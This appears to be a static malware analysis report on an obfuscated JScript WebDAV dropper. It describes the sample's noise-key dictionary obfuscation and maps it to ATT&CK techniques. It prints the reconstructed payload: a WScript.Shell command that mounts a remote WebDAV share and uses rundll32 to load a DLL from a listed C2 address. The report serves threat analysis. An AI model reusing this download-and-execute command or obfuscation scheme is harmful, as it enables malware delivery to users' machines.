familyunclassified-js-webdav-dropperconfidencehigh
SHA-256: 8821c53f677a1d84b8389c328e0e3d5966d320eece827fef890d217936685e9c

Static Deep-Dive — 8821c53f677a1d84b8389c328e0e3d5966d320eece827fef890d217936685e9c

Classification: unclassified-js-webdav-dropper (96th confirmed sibling)

Build / RE

  • Language: JScript (Windows Script Host). Single-line file, 1,163,325 bytes. ^[file.txt]
  • Obfuscation: JScript dictionary lookup table — extreme variable-name padding (2,500-char keys). 62 key/value pairs mapping single-character values to random-noise dictionary keys averaging 2,500 characters each (range 2,059–3,999). Keys are fully random lowercase ASCII strings with no semantic content. Values are single printable characters assigned via dict['noisykey']='X'.
  • Assembly engine: Function('return this')() — the Function constructor receives a concatenated string built from sequential dictionary lookups (132 lookups, 33 unique keys reused with last-wins semantics), evaluates to return this, then this resolves to the global object where .WScript.CreateObject(...) is available.
  • Payload reconstruction (manual):
    this.WScript.CreateObject('WScript.Shell')
      .run('cmd /c net use \\\\.\\DavWWWRoot\\94.159.113.82@8888\\
            && rundll32 \\\\.\\DavWWWRoot\\94.159.113.82@8888\\16654515422584.dll,Entry')
    
    Reconstructed via ordered key extraction from the Function(...) call body. 132 sequential dictionary lookups resolve to returnthisWScriptCreateObjectWScriptShellruncmdcnetuse94159113828888davwwwrootrundll3294159113828888davwwwroot16654515422584dllEntry; interleaved literal strings (' ', '/', '\\', '@', '&', '.', ',') separate tokens and form the full command line. No eval() used; the Function constructor is the sole deobfuscation primitive.
  • Anti-analysis: None — no debugger checks, no VM detection, no time gates, no connectivity checks.
  • Code quality: Low — hand-written noise-obfuscation, repetitive, no commercial obfuscator signatures.

Deploy / ATT&CK

Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) .js file executed by WScript; WScript.CreateObject and WScript.Shell APIs
Execution T1059.003 (Windows Command Shell) cmd /c prefix in Shell.run() argument
Execution T1218.011 (Rundll32) rundll32 \\\\.\\DavWWWRoot\\94.159.113.82@8888\\16654515422584.dll,Entry
Defense Evasion T1218 (System Binary Proxy Execution) rundll32 is a signed system binary
Defense Evasion T1027 (Obfuscated Files or Information) 62-entry noise-key dictionary obfuscation with 2,500-char keys
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP via UNC path \\94.159.113.82@8888\\DavWWWRoot\\
Command & Control T1105 (Ingress Tool Transfer) net use mounts WebDAV share; rundll32 fetches and loads remote DLL

Infrastructure: C2 94.159.113.82:8888 (same /24 subnet as 65 prior siblings: .80, .82, .84, .86, .204). Payload DLL name 16654515422584.dll.

Notable absence: No PowerShell wrapper (-EncodedCommand or -windowstyle hidden), no wordpad decoy, no timeout anti-emulation gate, no regsvr32 /s — this sample uses only rundll32 ...,Entry. The smallest execution footprint observed in the family to date.

Attribution: Same actor/toolchain as unclassified-js-webdav-dropper. Extreme variable-name padding (2,500 chars) is a new size class within the existing noise-dictionary dialect. No new TTPs; this is an infrastructure-rotation + obfuscation-resize sibling.